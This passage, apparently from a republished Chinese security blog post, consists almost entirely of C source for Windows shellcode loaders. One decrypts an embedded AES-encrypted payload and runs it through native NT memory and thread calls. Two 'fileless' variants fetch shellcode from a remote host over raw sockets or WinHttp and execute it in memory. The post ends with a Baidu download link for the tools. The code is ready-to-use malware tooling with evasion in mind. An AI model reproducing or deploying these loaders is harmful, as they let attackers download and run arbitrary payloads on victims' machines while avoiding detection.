0x73, 0x3c, 0x8c, 0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 0xf1, 0xd7, 0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };

   DWORD payload_length = sizeof(AESshellcode);

   PVOID BaseAddress = NULL;

   SIZE_T dwSize = 0x2000;

    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (!NT_SUCCESS(status1)) {

        return 1;

    }

    // Decrypt the AES payload to Original Shellcode

     DecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));

    RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));

    HANDLE hThread;

    DWORD OldProtect = 0;

 NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);

    if (!NT_SUCCESS(NtProtectStatus1)) {

        return 2;

    }

    HANDLE hHostThread = INVALID_HANDLE_VALUE;

NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

    if (!NT_SUCCESS(NtCreateThreadstatus)) {

        printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());

        return 3;

    }

    LARGE_INTEGER Timeout;

    Timeout.QuadPart = -10000000;

  NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);

    if (!NT_SUCCESS(NTWFSOstatus)) {

        printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());

        return 4;

    }

    return 0;

}


4、FileLess shellcode:

4-1、Using Sockets:

// credits : @SEKTOR7Module stomping, Module Unhooking, No New Thread, Function obfuscation

#include <winsock2.h>

#include <ws2tcpip.h>

#include <Windows.h>

#include <stdio.h>

#pragma comment(lib, "ntdll")

#pragma comment (lib, "Ws2_32.lib")

#pragma comment (lib, "Mswsock.lib")

#pragma comment (lib, "AdvApi32.lib")

#define NtCurrentProcess()   ((HANDLE)-1)

#define DEFAULT_BUFLEN 4096

#ifndef NT_SUCCESS

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory(

    HANDLE    ProcessHandle,

    PVOID* BaseAddress,

    ULONG_PTR ZeroBits,

    PSIZE_T   RegionSize,

    ULONG     AllocationType,

    ULONG     Protect

);

EXTERN_C NTSTATUS NtProtectVirtualMemory(

    IN HANDLE ProcessHandle,

    IN OUT PVOID* BaseAddress,

    IN OUT PSIZE_T RegionSize,

    IN ULONG NewProtect,

    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(

    OUT PHANDLE hThread,

    IN ACCESS_MASK DesiredAccess,

    IN PVOID ObjectAttributes,

    IN HANDLE ProcessHandle,

    IN PVOID lpStartAddress,

    IN PVOID lpParameter,

    IN ULONG Flags,

    IN SIZE_T StackZeroBits,

    IN SIZE_T SizeOfStackCommit,

    IN SIZE_T SizeOfStackReserve,

    OUT PVOID lpBytesBuffer

);

EXTERN_C NTSTATUS NtWaitForSingleObject(

    IN HANDLE         Handle,

    IN BOOLEAN        Alertable,

    IN PLARGE_INTEGER Timeout

);

void RunShellcode(char* shellcode, DWORD shellcodeLen) {

    PVOID BaseAddress = NULL;

    SIZE_T dwSize = 0x2000;

    PCSTR Terminator = NULL;

    NTSTATUS STATUS;

    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (!NT_SUCCESS(status1)) {

        return ;

    }

    RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);

    HANDLE hThread;

    DWORD OldProtect = 0;

    NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);

    if (!NT_SUCCESS(NtProtectStatus1)) {

        return ;

    }

    HANDLE hHostThread = INVALID_HANDLE_VALUE;

    NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

    if (!NT_SUCCESS(NtCreateThreadstatus)) {

        printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());

        return ;

    }

    LARGE_INTEGER Timeout;

    Timeout.QuadPart = -10000000;

    NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);

    if (!NT_SUCCESS(NTWFSOstatus)) {

        printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());

        return ;

    }

}

void getShellcode_Run(char* host, char* port, char* resource) {

    DWORD oldp = 0;

    BOOL returnValue;

    size_t origsize = strlen(host) + 1;

    const size_t newsize = 100;

    size_t convertedChars = 0;

    wchar_t Whost[newsize];

    mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);

    WSADATA wsaData;

    SOCKET ConnectSocket = INVALID_SOCKET;

    struct addrinfo* result = NULL,

        * ptr = NULL,

        hints;

    char sendbuf[MAX_PATH] = "";

    lstrcatA(sendbuf, "GET /");

    lstrcatA(sendbuf, resource);

    char recvbuf[DEFAULT_BUFLEN];

    memset(recvbuf, 0, DEFAULT_BUFLEN);

    int iResult;

    int recvbuflen = DEFAULT_BUFLEN;

    // Initialize Winsock

    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);

    if (iResult != 0) {

        printf("WSAStartup failed with error: %d\n", iResult);

        return ;

    }

    ZeroMemory(&hints, sizeof(hints));

    hints.ai_family = PF_INET;

    hints.ai_socktype = SOCK_STREAM;

    hints.ai_protocol = IPPROTO_TCP;

    // Resolve the server address and port

    iResult = getaddrinfo(host, port, &hints, &result);

    if (iResult != 0) {

        printf("getaddrinfo failed with error: %d\n", iResult);

        WSACleanup();

        return ;

    }

    // Attempt to connect to an address until one succeeds

    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

        // Create a SOCKET for connecting to server

        ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,

            ptr->ai_protocol);

        if (ConnectSocket == INVALID_SOCKET) {

            printf("socket failed with error: %ld\n", WSAGetLastError());

            WSACleanup();

            return ;

        }

        // Connect to server.

        printf("[+] Connect to %s:%s", host, port);

        iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);

        if (iResult == SOCKET_ERROR) {

            closesocket(ConnectSocket);

            ConnectSocket = INVALID_SOCKET;

            continue;

        }

        break;

    }

    freeaddrinfo(result);

    if (ConnectSocket == INVALID_SOCKET) {

        printf("Unable to connect to server!\n");

        WSACleanup();

        return ;

    }

    // Send an initial buffer

    iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);

    if (iResult == SOCKET_ERROR) {

        printf("send failed with error: %d\n", WSAGetLastError());

        closesocket(ConnectSocket);

        WSACleanup();

        return ;

    }

    printf("\n[+] Sent %ld Bytes\n", iResult);

     // shutdown the connection since no more data will be sent

    iResult = shutdown(ConnectSocket, SD_SEND);

    if (iResult == SOCKET_ERROR) {

        printf("shutdown failed with error: %d\n", WSAGetLastError());

        closesocket(ConnectSocket);

        WSACleanup();

        return ;

    }

    // Receive until the peer closes the connection

    do {

        iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);

        if (iResult > 0)

            printf("[+] Received %d Bytes\n", iResult);

        else if (iResult == 0)

            printf("[+] Connection closed\n");

        else

            printf("recv failed with error: %d\n", WSAGetLastError());

        RunShellcode(recvbuf, recvbuflen);

    } while (iResult > 0);

    // cleanup

    closesocket(ConnectSocket);

    WSACleanup();

}

int main(int argc, char** argv) {

    // Validate the parameters

    if (argc != 4) {

        printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]);

        return 1;

    }

    getShellcode_Run(argv[1], argv[2], argv[3]);

    return 0;

}


4-2、Using WinHttp:

#include <Windows.h>

#include <stdio.h>

#include <wininet.h>

#include <winhttp.h>

#include <vector>

#pragma comment(lib, "ntdll")

#pragma comment(lib, "winhttp")

#pragma warning (disable: 4996)

#define _CRT_SECURE_NO_WARNINGS

#define NtCurrentProcess()   ((HANDLE)-1)

#define DEFAULT_BUFLEN 4096

#ifndef NT_SUCCESS

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory(

    HANDLE    ProcessHandle,

    PVOID* BaseAddress,

    ULONG_PTR ZeroBits,

    PSIZE_T   RegionSize,

    ULONG     AllocationType,

    ULONG     Protect

);

EXTERN_C NTSTATUS NtProtectVirtualMemory(

    IN HANDLE ProcessHandle,

    IN OUT PVOID* BaseAddress,

    IN OUT PSIZE_T RegionSize,

    IN ULONG NewProtect,

    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(

    OUT PHANDLE hThread,

    IN ACCESS_MASK DesiredAccess,

    IN PVOID ObjectAttributes,

    IN HANDLE ProcessHandle,

    IN PVOID lpStartAddress,

    IN PVOID lpParameter,

    IN ULONG Flags,

    IN SIZE_T StackZeroBits,

    IN SIZE_T SizeOfStackCommit,

    IN SIZE_T SizeOfStackReserve,

    OUT PVOID lpBytesBuffer

);

EXTERN_C NTSTATUS NtWaitForSingleObject(

    IN HANDLE         Handle,

    IN BOOLEAN        Alertable,

    IN PLARGE_INTEGER Timeout

);

void RunShellcode(char* shellcode, DWORD shellcodeLen) {

    PVOID BaseAddress = NULL;

    SIZE_T dwSize2 = 0x2000;

    PCSTR Terminator = NULL;

    NTSTATUS STATUS;

    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (!NT_SUCCESS(status1)) {

        return ;

    }

    RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);

    HANDLE hThread;

    DWORD OldProtect = 0;

    NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);

    if (!NT_SUCCESS(NtProtectStatus1)) {

        return;

    }

    printf("\n\nShellcode_mem  :  %p\n\n", BaseAddress);

    getchar();

    HANDLE hHostThread = INVALID_HANDLE_VALUE;

    NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

    if (!NT_SUCCESS(NtCreateThreadstatus)) {

        printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());

        return;

    }

    LARGE_INTEGER Timeout;

    Timeout.QuadPart = -10000000;

 NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);

    if (!NT_SUCCESS(NTWFSOstatus)) {

   printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());

        return;

    }

}

void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) {

    DWORD dwSize = 0;

    DWORD dwDownloaded = 0;

    LPSTR pszOutBuffer = NULL;

    BOOL  bResults = FALSE;

    HINTERNET  hSession = NULL,

        hConnect = NULL,

        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.

    hSession = WinHttpOpen(L"WinHTTP Example/1.0",

        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,

        WINHTTP_NO_PROXY_NAME,  WINHTTP_NO_PROXY_BYPASS, 0);

    // Specify an HTTP server.

    if (hSession)

        hConnect = WinHttpConnect(hSession, whost, port, 0);

    else

        printf("Failed in WinHttpConnect (%u)\n", GetLastError());

    // Create an HTTP request handle.

    if (hConnect)

        hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource,

      NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, NULL);

    else

        printf("Failed in WinHttpOpenRequest (%u)\n", GetLastError());

    // Send a request.

    if (hRequest)

        bResults = WinHttpSendRequest(hRequest,

            WINHTTP_NO_ADDITIONAL_HEADERS,

            0, WINHTTP_NO_REQUEST_DATA, 0,  0, 0);

    else

        printf("Failed in WinHttpSendRequest (%u)\n", GetLastError());

    // End the request.

    if (bResults)

        bResults = WinHttpReceiveResponse(hRequest, NULL);

 else printf("Failed in WinHttpReceiveResponse (%u)\n", GetLastError());

    // Keep checking for data until there is nothing left.

    if (bResults)

        do

        {

            // Check for available data.

            dwSize = 0;

            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))

                printf("Error %u in WinHttpQueryDataAvailable (%u)\n", GetLastError());

            // Allocate space for the buffer.

            pszOutBuffer = new char[dwSize + 1];

            if (!pszOutBuffer)

            {

                printf("Out of memory\n");

                dwSize = 0;

            }

            else

            {

                // Read the Data.

                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,

                    dwSize, &dwDownloaded))

                    printf("Error %u in WinHttpReadData.\n", GetLastError());

                else {

                     // Run the shellcode

                    RunShellcode(pszOutBuffer, dwSize + 1);

                }

            }

        } while (dwSize > 0);

        // Report any errors.

        if (!bResults)

            printf("Error %d has occurred.\n", GetLastError());

        // Close any open handles.

        if (hRequest) WinHttpCloseHandle(hRequest);

        if (hConnect) WinHttpCloseHandle(hConnect);

        if (hSession) WinHttpCloseHandle(hSession);

}

int main(int argc, char** argv) {

    // Validate the parameters

    if (argc != 4) {

        printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]);

        return 1;

    }

    char* host = argv[1];

    DWORD port = atoi(argv[2]);

    char* resource = argv[3];

    const size_t cSize1 = strlen(host) + 1;

    wchar_t* whost = new wchar_t[cSize1];

    mbstowcs(whost, host, cSize1);

    const size_t cSize2 = strlen(resource) + 1;

    wchar_t* wresource = new wchar_t[cSize2];

    mbstowcs(wresource, resource, cSize2);

    getShellcode_Run(whost, port, wresource);

        return 0;

}

下址地址:

链接:https://pan.baidu.com/s/1aQkt93RPdFVR3wj0V13d4w 

提取码:9g8j 

题外话:用 VS2022-V17.5编译,果然如网上介绍的那样,超快,满意!


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NDcxMDQzNA==&mid=2247487673&idx=1&sn=6e76ee04efa8d03d4d3689be6e20decd&chksm=a682c67491f54f62790712779de759f9e3b1ad5312357d0f59420fd74437ae46d2c2bfbb79d8#rd
如有侵权请联系:admin#unsafe.sh